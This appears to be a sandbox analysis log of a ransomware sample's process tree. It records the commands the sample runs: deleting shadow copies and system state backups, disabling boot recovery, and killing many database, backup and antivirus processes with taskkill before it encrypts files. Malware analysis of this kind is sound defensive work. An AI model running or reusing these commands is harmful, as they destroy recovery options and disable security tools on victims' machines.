PID 2472 wrote to memory of 3148	2472	cmd.exe	taskkill.exe
PID 3676 wrote to memory of 3860	3676	build-x64-crypt.bin.exe	cmd.exe
PID 3676 wrote to memory of 3860	3676	build-x64-crypt.bin.exe	cmd.exe
PID 3860 wrote to memory of 2488	3860	cmd.exe	taskkill.exe
PID 3860 wrote to memory of 2488	3860	cmd.exe	taskkill.exe
PID 3676 wrote to memory of 1140	3676	build-x64-crypt.bin.exe	cmd.exe
PID 3676 wrote to memory of 1140	3676	build-x64-crypt.bin.exe	cmd.exe
PID 1140 wrote to memory of 2116	1140	cmd.exe	taskkill.exe
PID 1140 wrote to memory of 2116	1140	cmd.exe	taskkill.exe
PID 3676 wrote to memory of 252	3676	build-x64-crypt.bin.exe	cmd.exe
PID 3676 wrote to memory of 252	3676	build-x64-crypt.bin.exe	cmd.exe
PID 252 wrote to memory of 264	252	cmd.exe	taskkill.exe
PID 252 wrote to memory of 264	252	cmd.exe	taskkill.exe
PID 3676 wrote to memory of 3016	3676	build-x64-crypt.bin.exe	cmd.exe
PID 3676 wrote to memory of 3016	3676	build-x64-crypt.bin.exe	cmd.exe
PID 3016 wrote to memory of 1756	3016	cmd.exe	taskkill.exe
PID 3016 wrote to memory of 1756	3016	cmd.exe	taskkill.exe

C:\Users\Admin\AppData\Local\Temp\build-x64-crypt.bin.exe
"C:\Users\Admin\AppData\Local\Temp\build-x64-crypt.bin.exe"
1⤵
- Modifies extensions of user files
- Enumerates connected drives
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3676

C:\Windows\SYSTEM32\cmd.exe
cmd /C wmic.exe SHADOWCOPY DELETE /nointeractive
2⤵
- Suspicious use of WriteProcessMemory
PID:2568

C:\Windows\System32\Wbem\WMIC.exe
wmic.exe SHADOWCOPY DELETE /nointeractive
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3016

C:\Windows\SYSTEM32\cmd.exe
cmd /C wbadmin DELETE SYSTEMSTATEBACKUP
2⤵
- Suspicious use of WriteProcessMemory
PID:1644

C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP
3⤵
- Deletes System State backups
- Drops file in Windows directory
PID:1844

C:\Windows\SYSTEM32\cmd.exe
cmd /C wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
2⤵
- Suspicious use of WriteProcessMemory
PID:1568

C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
3⤵
- Deletes System State backups
- Drops file in Windows directory
PID:2128

C:\Windows\SYSTEM32\cmd.exe
cmd /C bcdedit.exe /set {default} recoveryenabled No
2⤵
- Suspicious use of WriteProcessMemory
PID:2472

C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled No
3⤵
- Modifies boot configuration data using bcdedit
PID:2936

C:\Windows\SYSTEM32\cmd.exe
cmd /C bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
2⤵
- Suspicious use of WriteProcessMemory
PID:3408

C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
3⤵
- Modifies boot configuration data using bcdedit
PID:1332

C:\Windows\SYSTEM32\cmd.exe
cmd /C vssadmin.exe Delete Shadows /All /Quiet
2⤵
- Suspicious use of WriteProcessMemory
PID:3356

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
3⤵
- Interacts with shadow copies
PID:2556

C:\Windows\SYSTEM32\cmd.exe
cmd /C C:\Windows\system32\vssvc.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:3236

C:\Windows\system32\VSSVC.exe
C:\Windows\system32\vssvc.exe
3⤵
PID:3744

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM wxServer*
2⤵
- Suspicious use of WriteProcessMemory
PID:1312

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM wxServer*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:272

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM QBFCService*
2⤵
- Suspicious use of WriteProcessMemory
PID:3016

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM QBFCService*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1772

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM QBVSS*
2⤵
- Suspicious use of WriteProcessMemory
PID:1844

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM QBVSS*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2120

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM sql*
2⤵
- Suspicious use of WriteProcessMemory
PID:2148

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM sql*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2736

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM msaccess*
2⤵
- Suspicious use of WriteProcessMemory
PID:2472

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM msaccess*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3148

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM mssql*
2⤵
- Suspicious use of WriteProcessMemory
PID:3860

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM mssql*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2488

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM mysql*
2⤵
- Suspicious use of WriteProcessMemory
PID:1140

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM mysql*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2116

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM wxServerView*
2⤵
- Suspicious use of WriteProcessMemory
PID:252

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM wxServerView*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:264

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM sqlmangr*
2⤵
- Suspicious use of WriteProcessMemory
PID:3016

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM sqlmangr*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1756

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM RAgui*
2⤵
PID:2784

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RAgui*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2484

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM supervise*
2⤵
PID:1332

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM supervise*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3984

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM Culture*
2⤵
PID:2556

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Culture*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2576

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM Defwatch*
2⤵
PID:3236

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Defwatch*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3768

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM winword*
2⤵
PID:1312

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM winword*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:268

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM QBW32*
2⤵
PID:1844

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM QBW32*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2056

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM QBDBMgr*
2⤵
PID:2148

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM QBDBMgr*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2476

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM qbupdate*
2⤵
PID:3296

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM qbupdate*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2616

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM axlbridge*
2⤵
PID:2576

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM axlbridge*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1584

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM httpd*
2⤵
PID:3768

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM httpd*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1604

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM fdlauncher*
2⤵
PID:272

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM fdlauncher*
3⤵
- Kills process with taskkill
PID:3016

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM MsDtSrvr*
2⤵
PID:2120

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MsDtSrvr*
3⤵
- Kills process with taskkill
PID:2784

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM java*
2⤵
PID:2744

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM java*
3⤵
PID:1144

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM 360se*
2⤵
PID:2616

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM 360se*
3⤵
PID:2820

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM 360doctor*
2⤵
PID:1584

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM 360doctor*
3⤵
PID:3236

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM wdswfsafe*
2⤵
PID:1628

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM wdswfsafe*
3⤵
PID:2780

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM fdhost*
2⤵
PID:2072

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM fdhost*
3⤵
- Kills process with taskkill
PID:3408

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM GDscan*
2⤵
PID:2112

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM GDscan*
3⤵
- Kills process with taskkill
PID:2960

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM ZhuDongFangYu*
2⤵
PID:3148

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM ZhuDongFangYu*
3⤵
PID:972

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM QBDBMgrN*
2⤵
PID:348

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM QBDBMgrN*
3⤵
PID:268

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM mysqld*
2⤵
PID:3100

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM mysqld*
3⤵
- Kills process with taskkill
PID:3640

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM AutodeskDesktopApp*
2⤵
PID:260

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM AutodeskDesktopApp*
3⤵
- Kills process with taskkill
PID:2480

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM acwebbrowser*
2⤵
PID:2144

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM acwebbrowser*
3⤵
PID:3528

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM Creative Cloud*
2⤵
PID:2132

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Creative Cloud*
3⤵
PID:3808

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM Adobe Desktop Service*
2⤵
PID:1140

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Adobe Desktop Service*
3⤵
- Kills process with taskkill
PID:2744

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM CoreSync*
2⤵
PID:3104

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM CoreSync*
3⤵
- Kills process with taskkill
PID:348

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM Adobe CEF Helper*
2⤵
PID:2420

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Adobe CEF Helper*
3⤵
PID:3100

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM node*
2⤵
PID:3744

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM node*
3⤵
- Kills process with taskkill
PID:256

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM AdobeIPCBroker*
2⤵
PID:1312

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM AdobeIPCBroker*
3⤵
- Kills process with taskkill
PID:1784

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM sync-taskbar*
2⤵
PID:1844

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM sync-taskbar*
3⤵
- Kills process with taskkill
PID:2120

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM sync-worker*
2⤵
PID:2580

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM sync-worker*
3⤵
PID:280

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM InputPersonalization*
2⤵
PID:2556

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM InputPersonalization*
3⤵
- Kills process with taskkill
PID:2588

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM AdobeCollabSync*
2⤵
PID:3728

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM AdobeCollabSync*
3⤵
- Kills process with taskkill
PID:1956

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM BrCtrlCntr*
2⤵
PID:2480

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM BrCtrlCntr*
3⤵
- Kills process with taskkill
PID:1788

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM BrCcUxSys*
2⤵
PID:3528

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM BrCcUxSys*
3⤵
- Kills process with taskkill
PID:2112

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM SimplyConnectionManager*
2⤵
PID:2132

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SimplyConnectionManager*
3⤵
PID:1800

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM Simply.SystemTrayIcon*
2⤵
PID:3296

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Simply.SystemTrayIcon*
3⤵
- Kills process with taskkill
PID:3016

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM fbguard*
2⤵
PID:268

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM fbguard*
3⤵
- Kills process with taskkill
PID:1628

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM fbserver*
2⤵
PID:3100

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM fbserver*
3⤵
PID:2072

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM ONENOTEM*
2⤵
PID:3860

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM ONENOTEM*
3⤵
PID:1320

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM wrapper*
2⤵
PID:2820

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM wrapper*
3⤵
- Kills process with taskkill
PID:2492

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM DefWatch*
2⤵
PID:3148

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM DefWatch*
3⤵
- Kills process with taskkill
PID:3152

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM ccEvtMgr*
2⤵
PID:992

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM ccEvtMgr*
3⤵
- Kills process with taskkill
PID:260

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM ccSetMgr*
2⤵
PID:3640

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM ccSetMgr*
3⤵
PID:1756

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM SavRoam*
2⤵
PID:2936

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SavRoam*
3⤵
PID:1656

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM Sqlservr*
2⤵
PID:3468

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Sqlservr*
3⤵
- Kills process with taskkill
PID:3500

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM sqlagent*
2⤵
PID:2484

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM sqlagent*
3⤵
PID:2152

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM sqladhlp*
2⤵
PID:1140

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM sqladhlp*
3⤵
- Kills process with taskkill
PID:1792

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM Culserver*
2⤵
PID:3104

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Culserver*
3⤵
PID:2500

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM RTVscan*
2⤵
PID:3408

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RTVscan*
3⤵
- Kills process with taskkill
PID:3236

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM sqlbrowser*
2⤵
PID:2476

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM sqlbrowser*
3⤵
PID:2616

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM SQLADHLP*
2⤵
PID:4040

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SQLADHLP*
3⤵
- Kills process with taskkill
PID:3684

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM QBIDPService*
2⤵
PID:68

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM QBIDPService*
3⤵
- Kills process with taskkill
PID:256

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM Intuit.QuickBooks.FCS*
2⤵
PID:2148

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Intuit.QuickBooks.FCS*
3⤵
- Kills process with taskkill
PID:1784

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM QBCFMonitorService*
2⤵
PID:3984

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM QBCFMonitorService*
3⤵
- Kills process with taskkill
PID:2120

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM sqlwriter*
2⤵
PID:3920

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM sqlwriter*
3⤵
- Kills process with taskkill
PID:280

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM msmdsrv*
2⤵
PID:3744

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM msmdsrv*
3⤵
- Kills process with taskkill
PID:2588

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM tomcat6*
2⤵
PID:1312

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM tomcat6*
3⤵
- Kills process with taskkill
PID:3768

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM zhudongfangyu*
2⤵
PID:1844

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM zhudongfangyu*
3⤵
- Kills process with taskkill
PID:1788

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM vmware-usbarbitator64*
2⤵
PID:348

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vmware-usbarbitator64*
3⤵
PID:2120

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM vmware-converter*
2⤵
PID:2056

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vmware-converter*
3⤵
- Kills process with taskkill
PID:280

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM dbsrv12*
2⤵
PID:2784

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM dbsrv12*
3⤵
- Kills process with taskkill
PID:2588

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM dbeng8*
2⤵
PID:1144

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM dbeng8*
3⤵
- Kills process with taskkill
PID:3768

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*
2⤵
PID:3520

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQL$MICROSOFT##WID*
3⤵
- Kills process with taskkill
PID:1788

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$VEEAMSQL2012*
2⤵
PID:2672

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQL$VEEAMSQL2012*
3⤵
- Kills process with taskkill
PID:2120

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM SQLAgent$VEEAMSQL2012*
2⤵
PID:1800

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SQLAgent$VEEAMSQL2012*
3⤵
- Kills process with taskkill
PID:280

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM SQLBrowser*
2⤵
PID:3016

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SQLBrowser*
3⤵
PID:2588

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM SQLWriter*
2⤵
PID:1628

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SQLWriter*
3⤵
- Kills process with taskkill
PID:3768

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM FishbowlMySQL*
2⤵
PID:2072

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FishbowlMySQL*
3⤵
- Kills process with taskkill
PID:1788

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*
2⤵
PID:2420

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQL$MICROSOFT##WID*
3⤵
- Kills process with taskkill
PID:2120

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM MySQL57*
2⤵
PID:3972

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MySQL57*
3⤵
- Kills process with taskkill
PID:280

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
2⤵
PID:3772

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
3⤵
- Kills process with taskkill
PID:2588

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM MSSQLServerADHelper100*
2⤵
PID:1304

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQLServerADHelper100*
3⤵
PID:3768

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*
2⤵
PID:3528

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*
3⤵
- Kills process with taskkill
PID:2484

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM msftesql-Exchange*
2⤵
PID:2496

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM msftesql-Exchange*
3⤵
- Kills process with taskkill
PID:1332

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*
2⤵
PID:2492

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*
3⤵
PID:2780

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$SBSMONITORING*
2⤵
PID:2576

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQL$SBSMONITORING*
3⤵
- Kills process with taskkill
PID:2152

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$SHAREPOINT*
2⤵
PID:1956

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQL$SHAREPOINT*
3⤵
- Kills process with taskkill
PID:3768

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*
2⤵
PID:1784

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*
3⤵
PID:2484

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*
2⤵
PID:3104

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*
3⤵
- Kills process with taskkill
PID:1332

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM SQLAgent$SBSMONITORING*
2⤵
PID:3408

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SQLAgent$SBSMONITORING*
3⤵
- Kills process with taskkill
PID:2780

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /T /IM SQLAgent$SHAREPOINT*
2⤵
PID:2476

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SQLAgent$SHAREPOINT*
3⤵
- Kills process with taskkill
PID:2152

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1056

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\ArlomQ-decrypt.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
PID:992